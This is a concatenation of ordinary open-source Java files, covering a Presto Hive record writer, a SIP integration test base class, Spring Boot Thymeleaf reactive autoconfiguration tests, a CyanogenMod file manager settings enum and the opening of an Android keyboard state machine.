if (!HiveConf.getBoolVar(conf, COMPRESSRESULT) || !HiveIgnoreKeyTextOutputFormat.class.getName().equals(outputFormat)) {
return "";
}
String compressionCodecClass = conf.get("mapred.output.compression.codec");
if (compressionCodecClass == null) {
return new DefaultCodec().getDefaultExtension();
}
try {
Class<? extends CompressionCodec> codecClass = conf.getClassByName(compressionCodecClass).asSubclass(CompressionCodec.class);
return ReflectionUtil.newInstance(codecClass, conf).getDefaultExtension();
}
catch (ClassNotFoundException e) {
throw new PrestoException(HIVE_UNSUPPORTED_FORMAT, "Compression codec not found: " + compressionCodecClass, e);
}
catch (RuntimeException e) {
throw new PrestoException(HIVE_UNSUPPORTED_FORMAT, "Failed to load compression codec: " + compressionCodecClass, e);
}
}
private Block[] getDataBlocks(Page page, Block sampleWeightBlock)
{
Block[] blocks = new Block[dataColumnInputIndex.length + (sampleWeightBlock != null ? 1 : 0)];
for (int i = 0; i < dataColumnInputIndex.length; i++) {
int dataColumn = dataColumnInputIndex[i];
blocks[i] = page.getBlock(dataColumn);
}
if (sampleWeightBlock != null) {
// sample weight block is always last
blocks[blocks.length - 1] = sampleWeightBlock;
}
return blocks;
}
private Block[] getPartitionBlocks(Page page)
{
Block[] blocks = new Block[partitionColumnsInputIndex.length];
for (int i = 0; i < partitionColumnsInputIndex.length; i++) {
int dataColumn = partitionColumnsInputIndex[i];
blocks[i] = page.getBlock(dataColumn);
}
return blocks;
}
@VisibleForTesting
public static class HiveRecordWriter
{
private final String partitionName;
private final boolean isNew;
private final String fileName;
private final String writePath;
private final String targetPath;
private final int fieldCount;
@SuppressWarnings("deprecation")
private final Serializer serializer;
private final RecordWriter recordWriter;
private final SettableStructObjectInspector tableInspector;
private final List<StructField> structFields;
private final Object row;
private final FieldSetter[] setters;
public HiveRecordWriter(
String schemaName,
String tableName,
String partitionName,
boolean compress,
boolean isNew,
List<DataColumn> inputColumns,
String outputFormat,
String serDe,
Properties schema,
String fileName,
String writePath,
String targetPath,
TypeManager typeManager,
JobConf conf)
{
this.partitionName = partitionName;
this.isNew = isNew;
this.fileName = fileName;
this.writePath = writePath;
this.targetPath = targetPath;
// existing tables may have columns in a different order
List<String> fileColumnNames = Splitter.on(',').trimResults().omitEmptyStrings().splitToList(schema.getProperty(META_TABLE_COLUMNS, ""));
List<HiveType> fileColumnHiveTypes = toHiveTypes(schema.getProperty(META_TABLE_COLUMN_TYPES, ""));
// verify we can write all input columns to the file
Map<String, DataColumn> inputColumnMap = inputColumns.stream()
.collect(toMap(DataColumn::getName, identity()));
Set<String> missingColumns = Sets.difference(inputColumnMap.keySet(), new HashSet<>(fileColumnNames));
if (!missingColumns.isEmpty()) {
throw new PrestoException(NOT_FOUND, format("Table %s.%s does not have columns %s", schema, tableName, missingColumns));
}
if (fileColumnNames.size() != fileColumnHiveTypes.size()) {
throw new PrestoException(HIVE_INVALID_METADATA, format("Partition '%s' in table '%s.%s' has mismatched metadata for column names and types",
partitionName,
schemaName,
tableName));
}
// verify the file types match the input type
// todo adapt input types to the file types as Hive does
for (int fileIndex = 0; fileIndex < fileColumnNames.size(); fileIndex++) {
String columnName = fileColumnNames.get(fileIndex);
HiveType fileColumnHiveType = fileColumnHiveTypes.get(fileIndex);
HiveType inputHiveType = inputColumnMap.get(columnName).getHiveType();
if (!fileColumnHiveType.equals(inputHiveType)) {
// todo this should be moved to a helper
throw new PrestoException(HIVE_PARTITION_SCHEMA_MISMATCH, format("" +
"There is a mismatch between the table and partition schemas. " +
"The column '%s' in table '%s.%s' is declared as type '%s', " +
"but partition '%s' declared column '%s' as type '%s'.",
columnName,
schemaName,
tableName,
inputHiveType,
partitionName,
columnName,
fileColumnHiveType));
}
}
fieldCount = fileColumnNames.size();
if (serDe.equals(org.apache.hadoop.hive.serde2.columnar.LazyBinaryColumnarSerDe.class.getName())) {
serDe = OptimizedLazyBinaryColumnarSerde.class.getName();
}
serializer = initializeSerializer(conf, schema, serDe);
recordWriter = HiveWriteUtils.createRecordWriter(new Path(writePath, fileName), conf, compress, schema, outputFormat);
List<Type> fileColumnTypes = fileColumnHiveTypes.stream()
.map(hiveType -> hiveType.getType(typeManager))
.collect(toList());
tableInspector = getStandardStructObjectInspector(fileColumnNames, getRowColumnInspectors(fileColumnTypes));
// reorder (and possibly reduce) struct fields to match input
structFields = ImmutableList.copyOf(inputColumns.stream()
.map(DataColumn::getName)
.map(tableInspector::getStructFieldRef)
.collect(toList()));
row = tableInspector.create();
setters = new FieldSetter[structFields.size()];
for (int i = 0; i < setters.length; i++) {
setters[i] = createFieldSetter(tableInspector, row, structFields.get(i), inputColumns.get(i).getType());
}
}
public void addRow(Block[] columns, int position)
{
for (int field = 0; field < fieldCount; field++) {
if (columns[field].isNull(position)) {
tableInspector.setStructFieldData(row, structFields.get(field), null);
}
else {
setters[field].setField(columns[field], position);
}
}
try {
recordWriter.write(serializer.serialize(row, tableInspector));
}
catch (SerDeException | IOException e) {
throw new PrestoException(HIVE_WRITER_DATA_ERROR, e);
}
}
public void commit()
{
try {
recordWriter.close(false);
}
catch (IOException e) {
throw new PrestoException(HIVE_WRITER_CLOSE_ERROR, "Error committing write to Hive", e);
}
}
public void rollback()
{
try {
recordWriter.close(true);
}
catch (IOException e) {
throw new PrestoException(HIVE_WRITER_CLOSE_ERROR, "Error rolling back write to Hive", e);
}
}
public PartitionUpdate getPartitionUpdate()
{
return new PartitionUpdate(
partitionName,
isNew,
writePath,
targetPath,
ImmutableList.of(fileName));
}
@SuppressWarnings("deprecation")
private static Serializer initializeSerializer(Configuration conf, Properties properties, String serializerName)
{
try {
Serializer result = (Serializer) Class.forName(serializerName).getConstructor().newInstance();
result.initialize(conf, properties);
return result;
}
catch (SerDeException | ReflectiveOperationException e) {
throw Throwables.propagate(e);
}
}
@Override
public String toString()
{
return toStringHelper(this)
.add("partitionName", partitionName)
.add("writePath", writePath)
.add("fileName", fileName)
.toString();
}
}
@VisibleForTesting
public static class DataColumn
{
private final String name;
private final Type type;
private final HiveType hiveType;
public DataColumn(String name, Type type, HiveType hiveType)
{
this.name = requireNonNull(name, "name is null");
this.type = requireNonNull(type, "type is null");
this.hiveType = requireNonNull(hiveType, "hiveType is null");
}
public String getName()
{
return name;
}
public Type getType()
{
return type;
}
public HiveType getHiveType()
{
return hiveType;
}
}
}
|
|
// ========================================================================
// Copyright 2009 NEXCOM Systems
// ------------------------------------------------------------------------
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ========================================================================
package org.cipango.kaleo.sipunit;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.ListIterator;
import java.util.Properties;
import javax.sip.address.AddressFactory;
import javax.sip.header.Header;
import javax.sip.header.HeaderFactory;
import javax.sip.message.Message;
import org.cafesip.sipunit.SipPhone;
import org.cafesip.sipunit.SipStack;
import org.cafesip.sipunit.SipTestCase;
import org.cipango.kaleo.xcap.XcapUri;
public abstract class UaTestCase extends SipTestCase
{
protected static HeaderFactory __headerFactory;
protected static AddressFactory __addressFactory;
private SipStack _sipStack;
private SipPhone _alicePhone;
private SipPhone _bobPhone;
protected Properties _properties;
public UaTestCase()
{
try
{
_properties = new Properties();
_properties.load(getClass().getClassLoader().getResourceAsStream("integrationTests.properties"));
}
catch (Exception e)
{
throw new RuntimeException(e);
}
}
public void setContent(String xcapUri) throws IOException
{
XcapUri uri = new XcapUri(xcapUri, "/");
String doc = uri.getDocumentSelector().replace(":", "%3A");
File sourceFile = new File("target/test-classes/xcap-root", doc);
if (!sourceFile.exists())
sourceFile = new File("target/test-classes/xcap-root", doc.replace("@", "%40"));
InputStream is = new FileInputStream(sourceFile);
File outputFile = new File("target/test-data", doc.replace("@", "%40"));
outputFile.getParentFile().mkdirs();
ByteArrayOutputStream os = new ByteArrayOutputStream();
int read;
byte[] buffer = new byte[1024];
while ((read = is.read(buffer)) != -1) {
os.write(buffer, 0, read);
}
String content = new String(os.toByteArray());
content = content.replaceAll("http://xcap.cipango.org", getHttpXcapUri());
FileOutputStream fos = new FileOutputStream(outputFile);
fos.write(content.getBytes());
fos.close();
is.close();
}
public String getProtocol()
{
return _properties.getProperty("sipunit.test.protocol");
}
public int getInt(String property)
{
return Integer.parseInt(_properties.getProperty(property));
}
public int getLocalPort()
{
return getInt("sipunit.test.port");
}
public int getRemotePort()
{
return getInt("sipunit.proxy.port");
}
public String getRemoteHost()
{
return _properties.getProperty("sipunit.proxy.host");
}
public String getAliceUri()
{
return "sip:alice@" + _properties.getProperty("sipunit.test.domain");
}
public String getBobUri()
{
return "sip:bob@" + _properties.getProperty("sipunit.test.domain");
}
public String getTo()
{
return "sip:sipServlet@" + _properties.getProperty("sipunit.test.domain");
}
public String getHttpXcapUri()
{
return _properties.getProperty("http.xcap.uri");
}
public SipPhone getAlicePhone()
{
return _alicePhone;
}
public SipPhone getBobPhone()
{
try {
if (_bobPhone == null)
{
_bobPhone = _sipStack.createSipPhone(getRemoteHost(), getProtocol(),
getRemotePort(), getBobUri());
}
return _bobPhone;
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public void setUp() throws Exception
{
_sipStack = new SipStack(getProtocol(), getLocalPort(), (Properties) _properties.clone());
SipStack.setTraceEnabled(_properties.getProperty("sipunit.trace").equalsIgnoreCase("true"));
_alicePhone = _sipStack.createSipPhone(getRemoteHost(), getProtocol(),
getRemotePort(), getAliceUri());
if (__headerFactory == null)
{
__headerFactory = _sipStack.getHeaderFactory();
__addressFactory = _sipStack.getAddressFactory();
}
}
public void tearDown() throws Exception
{
_alicePhone.dispose();
if (_bobPhone != null)
_bobPhone.dispose();
_sipStack.dispose();
}
/**
* Asserts that the given SIP message contains at least one occurrence of
* the specified header and that at least one occurrence of this header
* contains the given value. The assertion fails if no occurrence of the
* header contains the value or if the header is not present in the mesage.
*
* @param sipMessage
* the SIP message.
* @param header
* the string identifying the header as specified in RFC-3261.
* @param value
* the string value within the header to look for. An exact
* string match is done against the entire contents of the
* header. The assertion will pass if any part of the header
* matches the value given.
*/
public void assertHeaderContains(Message sipMessage, String header,
String value)
{
assertHeaderContains(null, sipMessage, header, value); // value is case
// sensitive?
}
/**
* Asserts that the given SIP message contains at least one occurrence of
* the specified header and that at least one occurrence of this header
* contains the given value. The assertion fails if no occurrence of the
* header contains the value or if the header is not present in the mesage.
* Assertion failure output includes the given message text.
*
* @param msg
* message text to output if the assertion fails.
* @param sipMessage
* the SIP message.
* @param header
* the string identifying the header as specified in RFC-3261.
* @param value
* the string value within the header to look for. An exact
* string match is done against the entire contents of the
* header. The assertion will pass if any part of the header
* matches the value given.
*/
public void assertHeaderContains(String msg, Message sipMessage,
String header, String value)
{
assertNotNull("Null assert object passed in", sipMessage);
ListIterator<Header> l = sipMessage.getHeaders(header);
while (l.hasNext())
{
String h = ((Header) l.next()).toString();
if (h.indexOf(value) != -1)
return;
}
fail(msg);
}
public void assertBetween(int min, int max, int actual)
{
if (actual > max)
fail("Got " + actual + " when max is " + max);
else if (actual < min)
fail("Got " + actual + " when min is " + min);
}
}
|
|
/*
* Copyright 2012-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.autoconfigure.thymeleaf;
import java.io.File;
import java.util.Collections;
import java.util.Locale;
import nz.net.ultraq.thymeleaf.LayoutDialect;
import nz.net.ultraq.thymeleaf.decorators.strategies.GroupingRespectLayoutTitleStrategy;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.thymeleaf.TemplateEngine;
import org.thymeleaf.context.Context;
import org.thymeleaf.context.IContext;
import org.thymeleaf.extras.springsecurity5.util.SpringSecurityContextUtils;
import org.thymeleaf.spring5.ISpringWebFluxTemplateEngine;
import org.thymeleaf.spring5.SpringWebFluxTemplateEngine;
import org.thymeleaf.spring5.context.webflux.SpringWebFluxContext;
import org.thymeleaf.spring5.templateresolver.SpringResourceTemplateResolver;
import org.thymeleaf.spring5.view.reactive.ThymeleafReactiveViewResolver;
import org.thymeleaf.templateresolver.ITemplateResolver;
import org.springframework.boot.autoconfigure.AutoConfigurations;
import org.springframework.boot.test.context.runner.ReactiveWebApplicationContextRunner;
import org.springframework.boot.test.system.CapturedOutput;
import org.springframework.boot.test.system.OutputCaptureExtension;
import org.springframework.boot.testsupport.BuildOutput;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.http.MediaType;
import org.springframework.mock.http.server.reactive.MockServerHttpRequest;
import org.springframework.mock.web.server.MockServerWebExchange;
import org.springframework.security.authentication.TestingAuthenticationToken;
import org.springframework.security.core.context.SecurityContextImpl;
import org.springframework.test.util.ReflectionTestUtils;
import static org.assertj.core.api.Assertions.assertThat;
/**
* Tests for {@link ThymeleafAutoConfiguration} in Reactive applications.
*
* @author Brian Clozel
* @author Kazuki Shimizu
* @author Stephane Nicoll
*/
@ExtendWith(OutputCaptureExtension.class)
class ThymeleafReactiveAutoConfigurationTests {
private final BuildOutput buildOutput = new BuildOutput(getClass());
private final ReactiveWebApplicationContextRunner contextRunner = new ReactiveWebApplicationContextRunner()
.withConfiguration(AutoConfigurations.of(ThymeleafAutoConfiguration.class));
@Test
void createFromConfigClass() {
this.contextRunner.withPropertyValues("spring.thymeleaf.suffix:.html").run((context) -> {
TemplateEngine engine = context.getBean(TemplateEngine.class);
Context attrs = new Context(Locale.UK, Collections.singletonMap("foo", "bar"));
String result = engine.process("template", attrs).trim();
assertThat(result).isEqualTo("<html>bar</html>");
});
}
@Test
void overrideCharacterEncoding() {
this.contextRunner.withPropertyValues("spring.thymeleaf.encoding:UTF-16").run((context) -> {
ITemplateResolver resolver = context.getBean(ITemplateResolver.class);
assertThat(resolver).isInstanceOf(SpringResourceTemplateResolver.class);
assertThat(((SpringResourceTemplateResolver) resolver).getCharacterEncoding()).isEqualTo("UTF-16");
ThymeleafReactiveViewResolver views = context.getBean(ThymeleafReactiveViewResolver.class);
assertThat(views.getDefaultCharset().name()).isEqualTo("UTF-16");
});
}
@Test
void overrideMediaTypes() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.media-types:text/html,text/plain").run(
(context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getSupportedMediaTypes())
.contains(MediaType.TEXT_HTML, MediaType.TEXT_PLAIN));
}
@Test
void overrideTemplateResolverOrder() {
this.contextRunner.withPropertyValues("spring.thymeleaf.templateResolverOrder:25")
.run((context) -> assertThat(context.getBean(ITemplateResolver.class).getOrder())
.isEqualTo(Integer.valueOf(25)));
}
@Test
void overrideViewNames() {
this.contextRunner.withPropertyValues("spring.thymeleaf.viewNames:foo,bar")
.run((context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getViewNames())
.isEqualTo(new String[] { "foo", "bar" }));
}
@Test
void overrideMaxChunkSize() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.maxChunkSize:8KB")
.run((context) -> assertThat(
context.getBean(ThymeleafReactiveViewResolver.class).getResponseMaxChunkSizeBytes())
.isEqualTo(Integer.valueOf(8192)));
}
@Test
void overrideFullModeViewNames() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.fullModeViewNames:foo,bar").run(
(context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getFullModeViewNames())
.isEqualTo(new String[] { "foo", "bar" }));
}
@Test
void overrideChunkedModeViewNames() {
this.contextRunner.withPropertyValues("spring.thymeleaf.reactive.chunkedModeViewNames:foo,bar").run(
(context) -> assertThat(context.getBean(ThymeleafReactiveViewResolver.class).getChunkedModeViewNames())
.isEqualTo(new String[] { "foo", "bar" }));
}
@Test
void overrideEnableSpringElCompiler() {
this.contextRunner.withPropertyValues("spring.thymeleaf.enable-spring-el-compiler:true").run(
(context) -> assertThat(context.getBean(SpringWebFluxTemplateEngine.class).getEnableSpringELCompiler())
.isTrue());
}
@Test
void enableSpringElCompilerIsDisabledByDefault() {
this.contextRunner.run(
(context) -> assertThat(context.getBean(SpringWebFluxTemplateEngine.class).getEnableSpringELCompiler())
.isFalse());
}
@Test
void overrideRenderHiddenMarkersBeforeCheckboxes() {
this.contextRunner.withPropertyValues("spring.thymeleaf.render-hidden-markers-before-checkboxes:true")
.run((context) -> assertThat(
context.getBean(SpringWebFluxTemplateEngine.class).getRenderHiddenMarkersBeforeCheckboxes())
.isTrue());
}
@Test
void enableRenderHiddenMarkersBeforeCheckboxesIsDisabledByDefault() {
this.contextRunner.run((context) -> assertThat(
context.getBean(SpringWebFluxTemplateEngine.class).getRenderHiddenMarkersBeforeCheckboxes()).isFalse());
}
@Test
void templateLocationDoesNotExist(CapturedOutput output) {
this.contextRunner.withPropertyValues("spring.thymeleaf.prefix:classpath:/no-such-directory/")
.run((context) -> assertThat(output).contains("Cannot find template location"));
}
@Test
void templateLocationEmpty(CapturedOutput output) {
new File(this.buildOutput.getTestResourcesLocation(), "empty-templates/empty-directory").mkdirs();
this.contextRunner.withPropertyValues("spring.thymeleaf.prefix:classpath:/empty-templates/empty-directory/")
.run((context) -> assertThat(output).doesNotContain("Cannot find template location"));
}
@Test
void useDataDialect() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
Context attrs = new Context(Locale.UK, Collections.singletonMap("foo", "bar"));
String result = engine.process("data-dialect", attrs).trim();
assertThat(result).isEqualTo("<html><body data-foo=\"bar\"></body></html>");
});
}
@Test
void useJava8TimeDialect() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
Context attrs = new Context(Locale.UK);
String result = engine.process("java8time-dialect", attrs).trim();
assertThat(result).isEqualTo("<html><body>2015-11-24</body></html>");
});
}
@Test
void useSecurityDialect() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
MockServerWebExchange exchange = MockServerWebExchange.from(MockServerHttpRequest.get("/test").build());
exchange.getAttributes().put(SpringSecurityContextUtils.SECURITY_CONTEXT_MODEL_ATTRIBUTE_NAME,
new SecurityContextImpl(new TestingAuthenticationToken("alice", "admin")));
IContext attrs = new SpringWebFluxContext(exchange);
String result = engine.process("security-dialect", attrs);
assertThat(result).isEqualTo("<html><body><div>alice</div></body></html>" + System.lineSeparator());
});
}
@Test
void renderTemplate() {
this.contextRunner.run((context) -> {
ISpringWebFluxTemplateEngine engine = context.getBean(ISpringWebFluxTemplateEngine.class);
Context attrs = new Context(Locale.UK, Collections.singletonMap("foo", "bar"));
String result = engine.process("home", attrs).trim();
assertThat(result).isEqualTo("<html><body>bar</body></html>");
});
}
@Test
void layoutDialectCanBeCustomized() {
this.contextRunner.withUserConfiguration(LayoutDialectConfiguration.class)
.run((context) -> assertThat(
ReflectionTestUtils.getField(context.getBean(LayoutDialect.class), "sortingStrategy"))
.isInstanceOf(GroupingRespectLayoutTitleStrategy.class));
}
@Configuration(proxyBeanMethods = false)
static class LayoutDialectConfiguration {
@Bean
LayoutDialect layoutDialect() {
return new LayoutDialect(new GroupingRespectLayoutTitleStrategy());
}
}
}
|
|
/*
* Copyright (C) 2012 The CyanogenMod Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.cyanogenmod.filemanager.preferences;
import com.cyanogenmod.filemanager.util.FileHelper;
/**
* The enumeration of settings of FileManager application.
*/
public enum FileManagerSettings {
/**
* Whether is the first use of the application
* @hide
*/
SETTINGS_FIRST_USE("cm_filemanager_first_use", Boolean.TRUE), //$NON-NLS-1$
/**
* The access mode to use
* @hide
*/
SETTINGS_ACCESS_MODE("cm_filemanager_access_mode", AccessMode.SAFE), //$NON-NLS-1$
/**
* When secondary users will have a chrooted console
* @hide
*/
SETTINGS_RESTRICT_SECONDARY_USERS_ACCESS("cm_filemanager_restrict_secondary_users_access",
Boolean.TRUE), //$NON-NLS-1$
/**
* The initial directory to be used.
* @hide
*/
SETTINGS_INITIAL_DIR("cm_filemanager_initial_dir", FileHelper.ROOT_DIRECTORY), //$NON-NLS-1$
/**
* The view mode to use (simple, details, or icons).
* @hide
*/
SETTINGS_LAYOUT_MODE("cm_filemanager_layout_mode", NavigationLayoutMode.DETAILS), //$NON-NLS-1$
/**
* The sort mode to use (name or data, ascending or descending).
* @hide
*/
SETTINGS_SORT_MODE("cm_filemanager_sort_mode", NavigationSortMode.NAME_ASC), //$NON-NLS-1$
/**
* When to sort the directories before the files.
* @hide
*/
SETTINGS_SHOW_DIRS_FIRST("cm_filemanager_show_dirs_first", Boolean.TRUE), //$NON-NLS-1$
/**
* When to show the hidden files.
* @hide
*/
SETTINGS_SHOW_HIDDEN("cm_filemanager_show_hidden", Boolean.TRUE), //$NON-NLS-1$
/**
* When to show the system files.
* @hide
*/
SETTINGS_SHOW_SYSTEM("cm_filemanager_show_system", Boolean.TRUE), //$NON-NLS-1$
/**
* When to show the symlinks files.
* @hide
*/
SETTINGS_SHOW_SYMLINKS("cm_filemanager_show_symlinks", Boolean.TRUE), //$NON-NLS-1$
/**
* When to use case sensitive comparison in sorting of files
* @hide
*/
SETTINGS_CASE_SENSITIVE_SORT("cm_filemanager_case_sensitive_sort", Boolean.FALSE), //$NON-NLS-1$
/**
* Defines the filetime format mode to use
* @hide
*/
SETTINGS_FILETIME_FORMAT_MODE(
"cm_filemanager_filetime_format_mode", FileTimeFormatMode.LOCALE), //$NON-NLS-1$
/**
* When display a warning in free disk widget
* @hide
*/
SETTINGS_DISK_USAGE_WARNING_LEVEL(
"cm_filemanager_disk_usage_warning_level", //$NON-NLS-1$
new String("95")), //$NON-NLS-1$
/**
* When to compute folder statistics in folder properties dialog
* @hide
*/
SETTINGS_COMPUTE_FOLDER_STATISTICS(
"cm_filemanager_compute_folder_statistics", Boolean.FALSE), //$NON-NLS-1$
/**
* When to display thumbs of pictures, videos, ...
* @hide
*/
SETTINGS_DISPLAY_THUMBS(
"cm_filemanager_show_thumbs", Boolean.FALSE), //$NON-NLS-1$
/**
* Whether use flinger to remove items
* @hide
*/
SETTINGS_USE_FLINGER("cm_filemanager_use_flinger", Boolean.FALSE), //$NON-NLS-1$
/**
* When to highlight the terms of the search in the search results
* @hide
*/
SETTINGS_HIGHLIGHT_TERMS("cm_filemanager_highlight_terms", Boolean.TRUE), //$NON-NLS-1$
/**
* When to show the relevance widget on searches
* @hide
*/
SETTINGS_SHOW_RELEVANCE_WIDGET(
"cm_filemanager_show_relevance_widget", //$NON-NLS-1$
Boolean.TRUE),
/**
* How to sort the search results
* @hide
*/
SETTINGS_SORT_SEARCH_RESULTS_MODE(
"cm_filemanager_sort_search_results_mode", //$NON-NLS-1$
SearchSortResultMode.RELEVANCE),
/**
* When to save the search terms
* @hide
*/
SETTINGS_SAVE_SEARCH_TERMS("cm_filemanager_save_search_terms", Boolean.TRUE), //$NON-NLS-1$
/**
* When to show debug traces
* @hide
*/
SETTINGS_SHOW_TRACES("cm_filemanager_show_debug_traces", Boolean.FALSE), //$NON-NLS-1$
/**
* When to editor should display suggestions
* @hide
*/
SETTINGS_EDITOR_NO_SUGGESTIONS(
"cm_filemanager_editor_no_suggestions", Boolean.FALSE), //$NON-NLS-1$
/**
* When to editor should use word wrap
* @hide
*/
SETTINGS_EDITOR_WORD_WRAP("cm_filemanager_editor_word_wrap", Boolean.TRUE), //$NON-NLS-1$
/**
* When to editor should open a binary file in a hex viewer
* @hide
*/
SETTINGS_EDITOR_HEXDUMP("cm_filemanager_editor_hexdump", Boolean.TRUE), //$NON-NLS-1$
/**
* When to editor should use the syntax highlight
* @hide
*/
SETTINGS_EDITOR_SYNTAX_HIGHLIGHT(
"cm_filemanager_editor_syntax_highlight", Boolean.TRUE), //$NON-NLS-1$
/**
* When to editor should use the default color scheme of the theme for syntax highlight
* @hide
*/
SETTINGS_EDITOR_SH_USE_THEME_DEFAULT(
"cm_filemanager_editor_sh_use_theme_default", Boolean.TRUE), //$NON-NLS-1$
/**
* When to editor should use the default color scheme of the theme for syntax highlight
* @hide
*/
SETTINGS_EDITOR_SH_COLOR_SCHEME(
"cm_filemanager_editor_sh_color_scheme", ""), //$NON-NLS-1$ //$NON-NLS-2$
/**
* The current theme to use in the app
* @hide
*/
SETTINGS_THEME("cm_filemanager_theme", //$NON-NLS-1$
"com.cyanogenmod.filemanager:light"); //$NON-NLS-1$
/**
* A broadcast intent that is sent when a setting was changed
*/
public final static String INTENT_SETTING_CHANGED =
"com.cyanogenmod.filemanager.INTENT_SETTING_CHANGED"; //$NON-NLS-1$
/**
* A broadcast intent that is sent when a theme was changed
*/
public final static String INTENT_THEME_CHANGED =
"com.cyanogenmod.filemanager.INTENT_THEME_CHANGED"; //$NON-NLS-1$
/**
* A broadcast intent that is sent when a file was changed
*/
public final static String INTENT_FILE_CHANGED =
"com.cyanogenmod.filemanager.INTENT_FILE_CHANGED"; //$NON-NLS-1$
/**
* The extra key with the preference key that was changed
*/
public final static String EXTRA_SETTING_CHANGED_KEY = "preference"; //$NON-NLS-1$
/**
* The extra key with the file key that was changed
*/
public final static String EXTRA_FILE_CHANGED_KEY = "file"; //$NON-NLS-1$
/**
* The extra key with the file key that was changed
*/
public final static String EXTRA_THEME_PACKAGE = "package"; //$NON-NLS-1$
/**
* The extra key with the identifier of theme that was changed
*/
public final static String EXTRA_THEME_ID = "id"; //$NON-NLS-1$
private final String mId;
private final Object mDefaultValue;
/**
* Constructor of <code>FileManagerSettings</code>.
*
* @param id The unique identifier of the setting
* @param defaultValue The default value of the setting
*/
private FileManagerSettings(String id, Object defaultValue) {
this.mId = id;
this.mDefaultValue = defaultValue;
}
/**
* Method that returns the unique identifier of the setting.
* @return the mId
*/
public String getId() {
return this.mId;
}
/**
* Method that returns the default value of the setting.
*
* @return Object The default value of the setting
*/
public Object getDefaultValue() {
return this.mDefaultValue;
}
/**
* Method that returns an instance of {@link FileManagerSettings} from its.
* unique identifier
*
* @param id The unique identifier
* @return FileManagerSettings The navigation sort mode
*/
public static FileManagerSettings fromId(String id) {
FileManagerSettings[] values = values();
int cc = values.length;
for (int i = 0; i < cc; i++) {
if (values[i].mId == id) {
return values[i];
}
}
return null;
}
}
|
|
/*
* Copyright (C) 2011 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.inputmethod.keyboard.internal;
import android.text.TextUtils;
import android.util.Log;
import com.udmurtlyk.extrainputmethod.latin.Constants;
import com.android.inputmethod.latin.utils.RecapitalizeStatus;
/**
* Keyboard state machine.
*
* This class contains all keyboard state transition logic.
*
* The input events are {@link #onLoadKeyboard(int, int)}, {@link #onSaveKeyboardState()},
* {@link #onPressKey(int,boolean,int,int)}, {@link #onReleaseKey(int,boolean,int,int)},
* {@link #onCodeInput(int,int,int)}, {@link #onFinishSlidingInput(int,int)},
* {@link #onUpdateShiftState(int,int)}, {@link #onResetKeyboardStateToAlphabet(int,int)}.
*
* The actions are {@link SwitchActions}'s methods.
*/
public final class KeyboardState {
private static final String TAG = KeyboardState.class.getSimpleName();
private static final boolean DEBUG_EVENT = false;
private static final boolean DEBUG_ACTION = false;
public interface SwitchActions {
public void setAlphabetKeyboard();
public void setAlphabetManualShiftedKeyboard();
public void setAlphabetAutomaticShiftedKeyboard();
public void setAlphabetShiftLockedKeyboard();
public void setAlphabetShiftLockShiftedKeyboard();
public void setEmojiKeyboard();
public void setSymbolsKeyboard();
public void setSymbolsShiftedKeyboard();
/**
* Request to call back {@link KeyboardState#onUpdateShiftState(int, int)}.
*/
public void requestUpdatingShiftState(final int currentAutoCapsState,
final int currentRecapitalizeState);
public void startDoubleTapShiftKeyTimer();
public boolean isInDoubleTapShiftKeyTimeout();
public void cancelDoubleTapShiftKeyTimer();
}
private final SwitchActions mSwitchActions;
private ShiftKeyState mShiftKeyState = new ShiftKeyState("Shift");
private ModifierKeyState mSymbolKeyState = new ModifierKeyState("Symbol");
// TODO: Merge {@link #mSwitchState}, {@link #mIsAlphabetMode}, {@link #mAlphabetShiftState},
// {@link #mIsSymbolShifted}, {@link #mPrevMainKeyboardWasShiftLocked}, and
// {@link #mPrevSymbolsKeyboardWasShifted} into single state variable.
private static final int SWITCH_STATE_ALPHA = 0;
private static final int SWITCH_STATE_SYMBOL_BEGIN = 1;
private static final int SWITCH_STATE_SYMBOL = 2;
private static final int SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL = 3;
